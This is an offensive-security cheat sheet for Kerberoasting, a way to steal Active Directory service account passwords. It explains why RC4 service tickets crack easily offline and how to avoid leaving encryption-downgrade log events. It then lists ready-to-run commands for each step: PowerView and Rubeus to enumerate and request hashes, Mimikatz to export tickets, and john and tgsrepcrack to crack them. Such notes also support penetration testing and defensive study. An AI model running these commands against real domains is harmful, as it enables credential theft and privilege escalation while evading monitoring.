- Offline cracking of service account passwords.
- The service ticket returned in a TGS-REP has a server portion (the EncTicketPart) that is encrypted with the long-term key of the service account owning the SPN. Any authenticated domain user can request a ticket for any SPN, so the ciphertext can be taken offline and password guesses tried against it with no further contact with the DC.
- Because (non-machine) service account passwords are rarely changed and are often human-chosen, this is a good attack vector. Machine accounts are not worth roasting: their passwords are long, random and rotated automatically.
- An important point is that the ticket must be encrypted with RC4-HMAC (etype 23), whose key is simply the account's NT hash: MD4 over the UTF-16LE password, with no salt and no iteration count. AES (etypes 17/18) derives the key with PBKDF2 over a salt built from the realm and username, so cracking an AES ticket is orders of magnitude slower (hashcat modes 19600/19700 exist for it, but it is only practical for very weak passwords).
- The DC will issue an RC4 ticket when the client asks for it and the service account's msDS-SupportedEncryptionTypes permits RC4 (user accounts with the attribute unset have historically been treated as RC4-only). Requesting RC4 for an account that advertises AES works but leaves an encryption-downgrade artefact (a 4769 event with ticket encryption type 0x17 for an account that normally gets 0x12), which is what Rubeus /rc4opsec avoids by roasting only accounts without AES enabled. If RC4 is disabled throughout the forest, the downgrade fails and only AES tickets can be obtained.
Obtaining tickets
PowerView:
Get-DomainUser -SPN
Invoke-Kerberoast | select Hash | ConvertTo-Csv
ActiveDirectory module:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Rubeus (/stats only lists roastable accounts with their encryption types and password-last-set years, without requesting tickets; /rc4opsec roasts only accounts without AES enabled so no encryption downgrade is logged; /outfile writes the hashes, in hashcat format by default):
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:username /simple
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:username /simple /rc4opsec
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Cracking
john.exe --wordlist:C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Misc.
klist.exe (list the tickets cached in the current logon session)
Invoke-Mimikatz -Command '"kerberos::list /export"' (export cached tickets as .kirbi files)
python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt 'tgs_file_name.kirbi' (crack an exported .kirbi directly, without converting it to a hash line first)